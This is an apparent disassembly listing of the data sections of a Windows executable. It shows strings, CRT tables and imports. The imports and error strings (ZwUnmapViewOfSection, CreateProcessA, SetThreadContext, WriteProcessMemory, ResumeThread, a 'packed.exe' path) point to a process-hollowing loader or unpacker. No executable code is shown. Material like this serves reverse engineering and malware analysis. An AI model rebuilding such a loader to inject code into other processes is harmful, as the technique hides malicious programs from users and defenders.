align 4
; char aOffsetToPeHead[]
aOffsetToPeHead db 'Offset to PE Header = ',0Ah,0 ; DATA XREF: sub_401000:loc_401087�o
; char aLoadFailed_Con[]
aLoadFailed_Con db 'Load failed. Consider making this EXE relocatable.',0Ah,0
; DATA XREF: sub_40148D:loc_401601�o
align 4
aWriteprocessme db 'WriteProcessMemory failed',0Ah,0 ; DATA XREF: sub_40148D:loc_4015FA�o
align 4
aNtdll_dll db 'ntdll.dll',0 ; DATA XREF: sub_40148D+68�o
align 10h
aZwunmapviewofs db 'ZwUnmapViewOfSection',0 ; DATA XREF: sub_40148D:loc_4014F0�o
align 4
; char aRb[]
aRb db 'rb',0 ; DATA XREF: WinMain(x,x,x,x)+33�o
align 10h
stru_4081C0 _msEH <0FFFFFFFFh, offset loc_402021, offset loc_402035>
; DATA XREF: start+2�o
align 10h
byte_4081D0 db 6 ; DATA XREF: __output:loc_4022BC�r
db 2 dup(0), 6
dd 100h, 6030010h, 10020600h, 45454504h, 5050505h, 303505h
dd 50h, 38282000h, 8075850h, 30303700h, 75057h, 8202000h
dd 0
db 8,'`h````',0
dd 78707000h, 8787878h, 807h, 8080007h, 8000008h, 7000800h
dd 8
aNull_0: ; DATA XREF: .data:off_40A05C�o
unicode 0, <(null)>,0
align 4
aNull db '(null)',0 ; DATA XREF: .data:off_40A058�o
align 4
aCorexitprocess db 'CorExitProcess',0 ; DATA XREF: unknown_libname_1+F�o
align 4
aMscoree_dll db 'mscoree.dll',0 ; DATA XREF: unknown_libname_1�o
aRuntimeError db 'runtime error ',0
align 10h
db 0Dh,0Ah,0
align 4
aTlossError db 'TLOSS error',0Dh,0Ah,0
align 4
aSingError db 'SING error',0Dh,0Ah,0
align 4
aDomainError db 'DOMAIN error',0Dh,0Ah,0
align 8
aR6029ThisAppli db 'R6029',0Dh,0Ah
db '- This application cannot run using the active version of the Mic'
db 'rosoft .NET Runtime',0Ah
db 'Please contact the application',27h,'s support team for more informa'
db 'tion.',0Dh,0Ah,0
align 4
aR6028UnableToI db 'R6028',0Dh,0Ah
db '- unable to initialize heap',0Dh,0Ah,0
align 4
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 4
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 4
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 4
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 4
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 10h
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 4
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 4
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aThisApplicatio db 0Dh,0Ah
db 'This application has requested the Runtime to terminate it in an '
db 'unusual way.',0Ah
db 'Please contact the application',27h,'s support team for more informa'
db 'tion.',0Dh,0Ah,0
align 4
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 10h
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: .data:off_40A2EC�o
db '- floating point not loaded',0Dh,0Ah,0
align 4
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: __NMSG_WRITE+123�o
; ___security_error_handler+132�o
align 10h
; char asc_408630[]
asc_408630 db 0Ah ; DATA XREF: __NMSG_WRITE+107�o
; ___security_error_handler+FC�o
db 0Ah,0
align 4
; char aRuntimeErrorPr[]
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: __NMSG_WRITE+F5�o
db 0Ah
db 'Program: ',0
align 10h
; char a___[]
a___ db '...',0 ; DATA XREF: __NMSG_WRITE+C1�o
; ___security_error_handler+CC�o
; char aProgramNameUnk[]
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: __NMSG_WRITE+8E�o
; ___security_error_handler+8B�o
byte_40866B db 0 ; DATA XREF: __wincmdln+1B�o
align 10h
stru_408670 _msEH <0FFFFFFFFh, offset loc_403E1D, offset loc_403E21>
; DATA XREF: sub_403DF0+2�o
align 10h
stru_408680 _msEH <0FFFFFFFFh, offset loc_403E61, offset loc_403E65>
; DATA XREF: sub_403E34+2�o
dd 41h dup(0)
asc_408790: ; DATA XREF: .data:off_40A428�o
unicode 0, < ((((( H>
dw 10h
dd 7 dup(100010h), 5 dup(840084h), 3 dup(100010h), 810010h
dd 2 dup(810081h), 10081h, 9 dup(10001h), 100001h, 2 dup(100010h)
dd 820010h, 2 dup(820082h), 20082h, 9 dup(20002h), 100002h
dd 100010h, 200010h, 40h dup(0)
db 2 dup(0)
word_408992 dw 20h ; DATA XREF: .data:off_40A42C�o
aHH:
unicode 0, < h(((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(1810181h), 0Ah dup(1010101h), 3 dup(100010h)
dd 3 dup(1820182h), 0Ah dup(1020102h), 2 dup(100010h)
dd 10h dup(200020h), 480020h, 8 dup(100010h), 140010h
dd 100014h, 2 dup(100010h), 100014h, 2 dup(100010h), 1010010h
dd 0Bh dup(1010101h), 1010010h, 3 dup(1010101h), 0Ch dup(1020102h)
dd 1020010h, 3 dup(1020102h), 1010102h, 0
stru_408B98 _msEH <0FFFFFFFFh, offset sub_40530A, offset sub_40530E>
; DATA XREF: sub_40531E-2F�o
aGetprocesswind db 'GetProcessWindowStation',0 ; DATA XREF: ___crtMessageBoxA+73�o
aGetuserobjecti db 'GetUserObjectInformationA',0 ; DATA XREF: ___crtMessageBoxA+62�o
align 4
aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: ___crtMessageBoxA+47�o
align 4
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: ___crtMessageBoxA+3F�o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: ___crtMessageBoxA+2E�o
aUser32_dll db 'user32.dll',0 ; DATA XREF: ___crtMessageBoxA+13�o
align 4
; char aProgram[]
aProgram db 'Program: ',0 ; DATA XREF: ___security_error_handler+108�o
align 10h
aABufferOverrun db 'A buffer overrun has been detected which has corrupted the progra'
; DATA XREF: ___security_error_handler+62�o
db 'm',27h,'s',0Ah
db 'internal state. The program cannot safely continue execution and'
db ' must',0Ah
db 'now be terminated.',0Ah,0
aBufferOverrunD db 'Buffer overrun detected!',0
; DATA XREF: ___security_error_handler:loc_406D29�o
align 10h
aASecurityError db 'A security error of unknown cause has been detected which has',0Ah
; DATA XREF: ___security_error_handler+4C�o
db 'corrupted the program',27h,'s internal state. The program cannot sa'
db 'fely',0Ah
db 'continue execution and must now be terminated.',0Ah,0
align 4
; char aUnknownSecurit[]
aUnknownSecurit db 'Unknown security failure detected!',0
; DATA XREF: ___security_error_handler+47�o
align 4
stru_408DB8 _msEH <0FFFFFFFFh, offset loc_406D04, offset loc_406D08>
; DATA XREF: ___security_error_handler+5�o
dword_408DC4 dd 0 ; DATA XREF: ___crtLCMapStringA+1C�o
; ___crtGetStringTypeA+1E�o
stru_408DC8 _msEH <0FFFFFFFFh, offset loc_40753A, offset loc_40753E>
; DATA XREF: ___crtLCMapStringA+2�o
dd 0FFFFFFFFh, 407337h, 40733Bh, 0FFFFFFFFh, 407405h, 407409h
dd 0
stru_408DF0 _msEH <0FFFFFFFFh, offset loc_4076D6, offset loc_4076DA>
; DATA XREF: ___crtGetStringTypeA+2�o
align 10h
stru_408E00 _msEH <0FFFFFFFFh, offset loc_40794E, offset loc_407952>
; DATA XREF: ___convertcp+2�o
align 10h
dd 48h, 0Eh dup(0)
dd offset dword_40A430
dd offset dword_408E60
dd 2, 2 dup(0)
dword_408E60 dd 3FBCh, 6624h, 0 ; DATA XREF: .rdata:00408E50�o
dword_408E6C dd 2 dup(0) ; DATA XREF: sub_403DF0+C�o
; sub_403DF0:loc_403E03�o
dword_408E74 dd 0 ; DATA XREF: sub_403E34+C�o
; sub_403E34:loc_403E47�o
dd 8EA0h, 2 dup(0)
dd 9444h, 8000h, 5 dup(0)
dd 8FACh, 8FBEh, 8FD2h, 8FE6h, 8FF8h, 900Eh, 9022h, 9032h
dd 9046h, 905Ch, 906Eh, 9082h, 9096h, 90A8h, 90B8h, 90CEh
dd 90E0h, 90F2h, 9102h, 910Eh, 911Eh, 912Ah, 9138h, 914Ch
dd 915Eh, 916Eh, 917Ch, 918Eh, 919Ah, 91A8h, 91B4h, 91D0h
dd 91EAh, 9202h, 921Ch, 9232h, 924Ch, 925Ah, 9268h, 9276h
dd 9284h, 9294h, 92A4h, 92B8h, 92C6h, 92D6h, 92E0h, 92ECh
dd 92F8h, 9304h, 931Ah, 932Ah, 9344h, 9354h, 936Ah, 9380h
dd 939Ah, 93A6h, 93B6h, 93C6h, 93DCh, 93ECh, 93FEh, 9410h
dd 9422h, 9434h, 0
dd 6956037Ch, 61757472h, 6575516Ch, 78457972h, 2AC0000h
aReadprocessmem db 'ReadProcessMemory',0
dw 1CDh
aGetthreadconte db 'GetThreadContext',0
align 2
db '`',0
aCreateprocessa db 'CreateProcessA',0
align 4
db 75h ; u
db 1, 47h, 65h
aTmodulefilenam db 'tModuleFileNameA',0
align 2
dw 34Fh
aTerminateproce db 'TerminateProcess',0
align 2
dw 2C5h
aResumethread db 'ResumeThread',0
align 2
dw 332h
aSetthreadconte db 'SetThreadContext',0
align 2
dw 39Dh
aWriteprocess_0 db 'WriteProcessMemory',0
align 4
db 98h ; ˜
db 1, 47h, 65h
aTprocaddress db 'tProcAddress',0
align 2
dw 177h
aGetmodulehandl db 'GetModuleHandleA',0
align 2
dw 37Ah
aVirtualprotect db 'VirtualProtectEx',0
align 2
dw 374h
aVirtualallocex db 'VirtualAllocEx',0
align 4
db 73h ; s
db 3, 56h, 69h
aRtualalloc db 'rtualAlloc',0
align 4
db 0Ch
db 3, 53h, 65h
aTfileattribute db 'tFileAttributesA',0
align 2
dw 1AFh
aGetstartupinfo db 'GetStartupInfoA',0
db 8
db 1, 47h, 65h
aTcommandlinea db 'tCommandLineA',0
dw 1DFh
aGetversionexa db 'GetVersionExA',0
dw 206h
aHeapalloc db 'HeapAlloc',0
dw 169h
aGetlasterror db 'GetLastError',0
align 2
dw 2A9h
aReadfile db 'ReadFile',0
align 2
aP db '¯',0
aExitprocess db 'ExitProcess',0
db 3Ah ; :
db 1, 47h, 65h
aTcurrentproces db 'tCurrentProcess',0
db 17h
db 3, 53h, 65h
aThandlecount db 'tHandleCount',0
align 2
dw 1B1h
aGetstdhandle db 'GetStdHandle',0
align 2
dw 15Eh
aGetfiletype db 'GetFileType',0
db 0Eh
db 3, 53h, 65h
aTfilepointer db 'tFilePointer',0
align 2
dw 20Ch
aHeapfree db 'HeapFree',0
align 2
a_ db '.',0
aClosehandle db 'CloseHandle',0
db 94h ; ”
db 3, 57h, 72h
aItefile db 'iteFile',0
db 60h ; `
db 3, 55h, 6Eh
aHandledexcepti db 'handledExceptionFilter',0
align 10h
aA db 'í',0
aFreeenvironmen db 'FreeEnvironmentStringsA',0
dw 14Dh
aGetenvironment db 'GetEnvironmentStrings',0
aU db 'î',0
aFreeenvironm_0 db 'FreeEnvironmentStringsW',0
db 87h ; ‡
db 3, 57h, 69h
aDechartomultib db 'deCharToMultiByte',0
dw 14Fh
aGetenvironme_0 db 'GetEnvironmentStringsW',0
align 4
db 0Ah
db 2, 48h, 65h
aApdestroy db 'apDestroy',0
dw 208h
aHeapcreate db 'HeapCreate',0
align 4
db 76h ; v
db 3, 56h, 69h
aRtualfree db 'rtualFree',0
dw 210h
aHeaprealloc db 'HeapReAlloc',0
db 2Ch ; ,
db 2, 49h, 73h
aBadwriteptr db 'BadWritePtr',0
db 2Ah ; *
db 3, 53h, 65h
aTstdhandle db 'tStdHandle',0
align 4
db 'å',0
aFlushfilebuffe db 'FlushFileBuffers',0
align 4
aM db 'M',0
aCreatefilea db 'CreateFileA',0
dw 248h
aLoadlibrarya db 'LoadLibraryA',0
align 2
dw 0F5h
aGetacp db 'GetACP',0
align 10h
db 8Bh ; ‹
db 1, 47h, 65h
aToemcp db 'tOEMCP',0
align 4
db 0FCh ; ü
align 2
aGetcpinfo db 'GetCPInfo',0
db 0CAh ; Ê
db 2, 52h, 74h
aLunwind db 'lUnwind',0
db 1Fh
db 2, 49h, 6Eh
aTerlockedexcha db 'terlockedExchange',0
dw 37Bh
aVirtualquery db 'VirtualQuery',0
align 2
dw 297h
aQueryperforman db 'QueryPerformanceCounter',0
db 0D5h ; Õ
db 1, 47h, 65h
aTtickcount db 'tTickCount',0
align 4
db 3Eh ; >
db 1, 47h, 65h
aTcurrentthread db 'tCurrentThreadId',0
align 2
dw 13Bh
aGetcurrentproc db 'GetCurrentProcessId',0
db 0C0h ; À
db 1, 47h, 65h
aTsystemtimeasf db 'tSystemTimeAsFileTime',0
dw 212h
aHeapsize db 'HeapSize',0
align 2
dw 303h
aSetendoffile db 'SetEndOfFile',0
align 2
dw 23Ah
aLcmapstringa db 'LCMapStringA',0
align 2
dw 26Bh
aMultibytetowid db 'MultiByteToWideChar',0
dd 434C023Bh, 5370614Dh, 6E697274h, 5767h, 654701B2h, 72745374h
dd 54676E69h, 41657079h, 1B50000h, 53746547h, 6E697274h
dd 70795467h, 5765h, 6547016Ch, 636F4C74h, 49656C61h, 416F666Eh
dd 3790000h, 74726956h, 506C6175h, 65746F72h, 7463h, 654701BBh
dd 73795374h, 496D6574h, 6F666Eh, 4E52454Bh, 32334C45h
dd 6C6C642Eh
db 2 dup(0)
_rdata ends
; Section 3. (virtual address 0000A000)
; Virtual size : 000024A8 ( 9384.)
; Section size in file : 000024A8 ( 9384.)
; Offset to raw data for section: 0000A000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 40A000h
dword_40A000 dd 0 ; DATA XREF: __cinit+45�o
dd offset ___security_init_cookie
dword_40A008 dd 0 ; DATA XREF: __cinit+4C�o
dword_40A00C dd 0 ; DATA XREF: __cinit+12�o
dd offset ___initstdio
dd offset ___onexitinit
dd offset ___initmbctable
dword_40A01C dd 0 ; DATA XREF: __cinit+17�o
dword_40A020 dd 0 ; DATA XREF: _doexit:loc_402F0D�o
dd offset ___endstdio
dword_40A028 dd 0 ; DATA XREF: _doexit+6C�o
dword_40A02C dd 0 ; DATA XREF: _doexit:loc_402F2C�o
dword_40A030 dd 4 dup(0) ; DATA XREF: _doexit+8B�o
; __int32 Offset
Offset dd 9400h ; DATA XREF: sub_401000+20�r
; sub_401000:loc_4010A9�r ...
align 10h
off_40A050 dd offset __exit ; DATA XREF: __amsg_exit+1C�r
dword_40A054 dd 2 ; DATA XREF: __NMSG_WRITE+58�r
; __FF_MSGBANNER+E�r ...
off_40A058 dd offset aNull ; DATA XREF: __output:loc_402648�r
; __output+51C�r
; "(null)"
off_40A05C dd offset aNull_0 ; DATA XREF: __output+2D8�r
; "(null)"
off_40A060 dd offset dword_40B4A0 ; DATA XREF: .text:00402A4A�o
; ___initstdio+52�o
align 8
dd offset dword_40B4A0
dd 101h
dword_40A070 dd 0FFFFFFFFh, 0 ; DATA XREF: ___initstdio+71�o
dd 1000h, 0
; FILE stru_40A080
stru_40A080 FILE <0, 0, 0, 2, 0FFFFFFFFh, 0, 0, 0> ; DATA XREF: _printf+3�o
; __stbuf+12�o ...
dword_40A0A0 dd 3 dup(0) ; DATA XREF: __stbuf:loc_4020FD�o
; __flsbuf+5B�o
dd 2, 0FFFFFFFFh, 3 dup(0)
dd 321888h, 0
dd 321888h, 9
dword_40A0D0 dd 3, 0 ; DATA XREF: ___initstdio+9A�o
dd 1000h, 81h dup(0)
dword_40A2E0 dd 0FFFFFFFFh, 0A80h ; DATA XREF: ___initstdio+67�o
; __filbuf:loc_402B8D�o ...
dword_40A2E8 dd 2 ; DATA XREF: __NMSG_WRITE:loc_403625�r
; __NMSG_WRITE+3A�r ...
off_40A2EC dd offset aR6002FloatingP ; DATA XREF: __NMSG_WRITE+D5�r
; __NMSG_WRITE+112�r ...
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 4085B4h, 9, 408588h, 0Ah, 4084F0h, 10h, 4084C4h
dd 11h, 408494h, 12h, 408470h, 13h, 408444h, 18h, 40840Ch
dd 19h, 4083E4h, 1Ah, 4083ACh, 1Bh, 408374h, 1Ch, 40834Ch
dd 1Dh, 4082A8h, 78h, 408294h, 79h, 408284h, 7Ah, 408274h
dd 0FCh, 408270h, 0FFh, 408260h
dword_40A380 dd 0C0000005h, 0Bh, 0 ; DATA XREF: .text:004037DF�o
; __XcptFilter+C�o
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
dd 0C000008Dh, 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
dd 0C0000090h, 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_40A3F8 dd 3 ; DATA XREF: __XcptFilter+84�r
dword_40A3FC dd 7 ; DATA XREF: __XcptFilter+89�r
dword_40A400 dd 0Ah ; DATA XREF: .text:_xcptlookup�r
; __XcptFilter+6�r
dword_40A404 dd 8Ch ; DATA XREF: __XcptFilter+B2�r
; __XcptFilter+BA�w ...
dd 10h, 0
off_40A410 dd offset __fptrap ; DATA XREF: __output+476�r
off_40A414 dd offset __fptrap ; DATA XREF: __output+4A2�r
dd offset __fptrap
off_40A41C dd offset __fptrap ; DATA XREF: __output+491�r
dd offset __fptrap
dd offset __fptrap
off_40A428 dd offset asc_408790 ; DATA XREF: __output:loc_40246C�r
; .text:004052E7�r ...
; " ((((( H"
off_40A42C dd offset word_408992 ; DATA XREF: .text:004052E1�r
dword_40A430 dd 0F5AAD7E7h ; DATA XREF: __output+E�r
; __NMSG_WRITE+E�r ...
align 10h
dword_40A440 dd 1 ; DATA XREF: __dosmaperr:loc_4054E7�r
dword_40A444 dd 16h ; DATA XREF: __dosmaperr:loc_40550B�r
dd 2 dup(2), 3, 2, 4, 18h, 5, 0Dh, 6, 9, 7, 0Ch, 8, 0Ch
dd 9, 0Ch, 0Ah, 7, 0Bh, 8, 0Ch, 16h, 0Dh, 16h, 0Fh, 2
dd 10h, 0Dh, 11h, 2 dup(12h), 2, 21h, 0Dh, 35h, 2, 41h
dd 0Dh, 43h, 2, 50h, 11h, 52h, 0Dh, 53h, 0Dh, 57h, 16h
dd 59h, 0Bh, 6Ch, 0Dh, 6Dh, 20h, 70h, 1Ch, 72h, 9, 6, 16h
dd 80h, 0Ah, 81h, 0Ah, 82h, 9, 83h, 16h, 84h, 0Dh, 91h
dd 29h, 9Eh, 0Dh, 0A1h, 2, 0A4h, 0Bh, 0A7h, 0Dh, 0B7h
dd 11h, 0CEh, 2, 0D7h, 0Bh, 718h, 0Ch, 2 dup(0)
byte_40A5B0 db 1 ; DATA XREF: __setmbcp+120�r
db 2, 4, 8
align 8
dword_40A5B8 dd 3A4h ; DATA XREF: __setmbcp:loc_406469�r
dword_40A5BC dd 82798260h ; DATA XREF: __setmbcp+15C�r
dd 21h, 0
dword_40A5C8 dd 0DFA6h ; DATA XREF: __setmbcp+100�r
align 10h
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dword_40A6A8 dd 19930520h, 5 dup(0) ; DATA XREF: .text:004066D3�o
; __NLG_Notify+2�o
dd 1
dword_40A6C4 dd 1 ; DATA XREF: _wctomb+30�r
; __ismbcspace:loc_407C6B�r
dd 2Eh, 1, 4 dup(0)
byte_40A6E0 db 0 ; DATA XREF: sub_401000+45�o
; sub_401229+41�o
dword_40A6E1 dd 0 ; DATA XREF: sub_401000:loc_401055�r
; sub_401000:loc_4010CA�r ...
align 4
dd 1FFh dup(0)
; void *Memory
Memory dd 0 ; DATA XREF: start+11C�w
; __setenvp:loc_403A0B�r ...
dd 0
dword_40AEEC dd 0 ; DATA XREF: __amsg_exit�r
; .text:_fast_error_exit�r ...
dd 2 dup(0)
dword_40AEF8 dd 2 ; DATA XREF: __stbuf:loc_402108�w
; __openfile+14C�w ...
dword_40AEFC dd 0 ; DATA XREF: _ftell+8F�w
; _fseek:loc_401D3D�w ...
dword_40AF00 dd 0 ; DATA XREF: __read+9B�w
; __read:loc_402DBD�w ...
dword_40AF04 dd 0 ; DATA XREF: __sopen+149�r
dword_40AF08 dd 2 ; DATA XREF: start+29�w ___heap_select�r ...
dword_40AF0C dd 0A28h ; DATA XREF: start+49�w start+5A�w
dword_40AF10 dd 501h ; DATA XREF: start+65�w
dword_40AF14 dd 5 ; DATA XREF: start+32�w
; ___heap_select+9�r ...
dword_40AF18 dd 1 ; DATA XREF: start+3A�w
dword_40AF1C dd 1 ; DATA XREF: __setargv+8F�w
dword_40AF20 dd 320B20h ; DATA XREF: __setargv+95�w
align 8
; void *dword_40AF28
dword_40AF28 dd 320B40h ; DATA XREF: __setenvp+48�w
; __setenvp:loc_403AAA�r ...
dd 3 dup(0)
off_40AF38 dd offset aCM_unpackerPac ; DATA XREF: __setargv+37�w
; "C:\\m_unpacker\\packed.exe"
align 10h
byte_40AF40 db 0 ; DATA XREF: ___endstdio+5�r
; _doexit+2D�w
align 4
dword_40AF44 dd 1 ; DATA XREF: _doexit+27�w
dword_40AF48 dd 1 ; DATA XREF: _doexit+7�r _doexit+B0�w
dword_40AF4C dd 0 ; DATA XREF: __FF_MSGBANNER+21�r
dword_40AF50 dd 0 ; DATA XREF: __XcptFilter+68�r
; __XcptFilter+73�w ...
align 8
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: __setargv+1C�o
; .data:off_40AF38�o
align 4
dd 3Ah dup(0)
byte_40B05C db 0 ; DATA XREF: __setargv+23�w
align 10h
dword_40B060 dd 1 ; DATA XREF: ___crtGetEnvironmentStringsA+2�r
; ___crtGetEnvironmentStringsA+24�w ...
dword_40B064 dd 0 ; DATA XREF: .text:0040507E�r
; .text:00405083�w ...
dword_40B068 dd 0 ; DATA XREF: _malloc�r
; _calloc:loc_405418�r ...
dword_40B06C dd 0 ; DATA XREF: __openfile+7�r
dword_40B070 dd 0 ; DATA XREF: ___crtMessageBoxA+9�r
; ___crtMessageBoxA+38�w ...
dword_40B074 dd 0 ; DATA XREF: ___crtMessageBoxA+4D�w
; ___crtMessageBoxA:loc_405E51�r
dword_40B078 dd 0 ; DATA XREF: ___crtMessageBoxA+5B�w
; ___crtMessageBoxA+D6�r
dword_40B07C dd 0 ; DATA XREF: ___crtMessageBoxA+7B�w
; ___crtMessageBoxA:loc_405E0C�r
dword_40B080 dd 0 ; DATA XREF: ___crtMessageBoxA+6C�w
; ___crtMessageBoxA+9C�r
dword_40B084 dd 1 ; DATA XREF: .text:_getSystemCP�w
; .text:004061D0�w ...
dword_40B088 dd 0 ; DATA XREF: __ValidateEH3RN:loc_406779�r
; __ValidateEH3RN+13F�r ...
align 10h
dword_40B090 dd 0 ; DATA XREF: __ValidateEH3RN:loc_40678C�r
; __ValidateEH3RN+1C4�r ...
dd 0Fh dup(0)
dword_40B0D0 dd 3 dup(0) ; DATA XREF: __ValidateEH3RN+12C�o
; __ValidateEH3RN+191�o ...
; int dword_40B0DC
dword_40B0DC dd 0 ; DATA XREF: _wctomb:loc_40528C�r
; ___crtLCMapStringA+265�r ...
dd 3 dup(0)
; int dword_40B0EC
dword_40B0EC dd 0 ; DATA XREF: _wctomb+41�r
; .text:004061FA�r ...
dd 0
dword_40B0F4 dd 0 ; DATA XREF: ___security_error_handler+17�r
; .text:00406E18�r ...
dword_40B0F8 dd 0 ; DATA XREF: __sopen+3D�r
dword_40B0FC dd 1 ; DATA XREF: ___crtLCMapStringA+E�r
; ___crtLCMapStringA+31�w ...
dword_40B100 dd 1 ; DATA XREF: ___crtGetStringTypeA+E�r
; ___crtGetStringTypeA+2E�w ...
; int dword_40B104
dword_40B104 dd 0 ; DATA XREF: _setSBCS+1A�w
; _setSBUpLow+84�r ...
dword_40B108 dd 0 ; DATA XREF: _setSBCS+15�w
; __setmbcp+14D�w ...
dd 5 dup(0)
byte_40B120 db 0 ; DATA XREF: _setSBCS+6�o __setmbcp+A7�o ...
byte_40B121 db 0 ; DATA XREF: _parse_cmdline+47�r
; _parse_cmdline+11D�r ...
align 4
dd 0Fh dup(0)
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 2 dup(0)
dd 20h, 10000000h, 10001000h, 2 dup(0)
dd 20000000h, 20002000h, 10h, 0
dd 20000000h, 2 dup(0)
dd 200000h, 20000000h, 0
dd 10101000h, 5 dup(10101010h), 10101000h, 10101010h, 6 dup(20202020h)
dd 20202000h, 20202020h, 20h
; int dword_40B224
dword_40B224 dd 4E4h ; DATA XREF: __ismbbkana�r _setSBCS+10�w ...
align 10h
dword_40B230 dd 4 dup(0) ; DATA XREF: _setSBCS+1F�o
; __setmbcp+162�o ...
byte_40B240 db 0 ; DATA XREF: _setSBUpLow:loc_406374�w
; _setSBUpLow:loc_406391�w ...
align 4
dd 0Fh dup(0)
dd 63626100h, 67666564h, 6B6A6968h, 6F6E6D6Ch, 73727170h
dd 77767574h, 7A7978h, 0
dd 43424100h, 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h
dd 57565554h, 5A5958h, 0
dd 83000000h, 0
dd 9A0000h, 9E009Ch, 2 dup(0)
dd 8A0000h, 0FF8E008Ch, 2 dup(0)
dd 0AA0000h, 2 dup(0)
dd 0B500h, 0BA0000h, 0
dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
dd 0F6F5F4h, 0FBFAF9F8h, 0DFFEFDFCh, 0C3C2C1C0h, 0C7C6C5C4h
dd 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h, 0D6D5D4h, 0DBDAD9D8h
dd 9FDEDDDCh, 0
; void *dword_40B344
dword_40B344 dd 0 ; DATA XREF: ___sbh_heap_init+21�w
; ___sbh_free_block+21C�r ...
dword_40B348 dd 0 ; DATA XREF: .text:00403EEF�r
; .text:00403F39�r ...
dword_40B34C dd 0 ; DATA XREF: .text:00403EFF�r
; .text:loc_403F43�r ...
dword_40B350 dd 0 ; DATA XREF: __heap_alloc+E�r
; __get_sbh_threshold+E�r ...
dword_40B354 dd 0 ; DATA XREF: ___sbh_heap_init+2F�w
; ___sbh_free_block+300�w ...
dword_40B358 dd 0 ; DATA XREF: ___sbh_heap_init+3C�w
; ___sbh_alloc_new_region+5�r ...
dword_40B35C dd 0 ; DATA XREF: ___sbh_free_block+229�r
; ___sbh_free_block+249�r ...
dword_40B360 dd 320000h ; DATA XREF: __heap_alloc+38�r
; _free+2A�r ...
dword_40B364 dd 1 ; DATA XREF: __heap_alloc�r
; __heap_alloc:loc_402081�r ...
dword_40B368 dd 20h ; DATA XREF: __read+B�r __ioinit+1F�w ...
dd 5 dup(0)
dword_40B380 dd 320650h ; DATA XREF: _ftell+57�r
; ___initstdio+7B�r ...
dword_40B384 dd 3Fh dup(0) ; DATA XREF: __ioinit+91�o
dword_40B480 dd 1 ; DATA XREF: .text:0040316B�o
; __setenvp+9F�w ...
dword_40B484 dd 320754h ; DATA XREF: _doexit+3E�r
; _doexit:loc_402EF8�r ...
; void *dword_40B488
dword_40B488 dd 320758h ; DATA XREF: _doexit+34�r _doexit+5A�r ...
dword_40B48C dd 1 ; DATA XREF: __wincmdln+4�r
; __setenvp+3�r ...
dword_40B490 dd 0 ; DATA XREF: __cinit�r
dword_40B494 dd 321080h ; DATA XREF: ___initstdio+2B�w
; ___initstdio+44�w ...
align 10h
dword_40B4A0 dd 400h dup(0) ; DATA XREF: .data:off_40A060�o
; .data:0040A068�o
; size_t dword_40C4A0
dword_40C4A0 dd 200h ; DATA XREF: ___initstdio�r
; ___initstdio:loc_402A6A�w ...
dword_40C4A4 dd 142340h ; DATA XREF: start+112�w
; __wincmdln:loc_4039AD�r ...
_data ends
; Section 5. (virtual address 0000E000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 0000D200
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 40E000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start